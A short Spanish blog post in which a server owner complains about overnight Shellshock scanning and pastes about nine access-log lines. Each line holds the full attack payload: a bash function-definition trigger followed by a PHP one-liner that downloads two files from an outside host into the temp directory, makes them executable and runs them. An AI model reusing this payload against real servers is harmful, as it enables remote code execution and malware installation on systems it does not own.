Shellshocks

Vuelven a la carga, toda la noche dando caña al pobre servidor intentando explotar shellshock. Y esta vez la ip era española, registrada en el dominio wmega.es. No se si la han petado … o es que ella se dedica a intentar petar.

94.23.86.112 – – [25/Sep/2015:03:01:41 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”
94.23.86.112 – – [25/Sep/2015:03:01:41 +0200] “GET /cgi-bin/php5-cli? HTTP/1.0” 404 497 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

php5 hack

La verdad es que tiene mas pinta de petada, porque he recibido mas intentos iguales desde distintas ips.

188.40.55.136 – – [25/Sep/2015:01:53:15 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 323 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

91.121.139.161 – – [24/Sep/2015:22:44:26 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 323 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

200.0.35.194 – – [24/Sep/2015:20:54:24 +0200] “GET /phppath/php HTTP/1.0” 404 492 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

93.189.4.131 – – [24/Sep/2015:17:45:47 +0200] “GET /cgi-bin/%2f/admin.html HTTP/1.0” 404 323 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

188.165.245.68 – – [24/Sep/2015:03:23:39 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

188.165.237.170 – – [24/Sep/2015:03:21:41 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

94.23.4.99 – – [24/Sep/2015:03:17:58 +0200] “GET /cgi-bin/php5? HTTP/1.0” 404 493 “() { :;} ;echo;/usr/local/bin/php -r ‘$a = \”http://x5d.su/s/susu1\”;”$b = \”http://x5d.su/s/susu2\”;”$c = sys_get_temp_dir();”$d = \”susu1\”;”$e = \”susu2\”;”$f = \”chmod 777\”;”$g = \”file_put_contents\”;”$h = \”system\”;”$i = \”file_exists\”;”$j = \”fopen\”;”if ($i($c . \”/$d\”))”{”exit(1);”}else{”echo($c);”$g(\”$c/$d\”, $j(\”$a\”, \”r\”));”$g(\”$c/$e\”, $j(\”$b\”, \”r\”));”$h(\”$f \” . $c .\”/$d\”);”$h(\”$f \” . $c .\”/$e\”);”$h($c . \”/$d\”);”$h($c . \”/$e\”);”}'” “-”

Y así un montón mas … que pesados …

Comments are closed.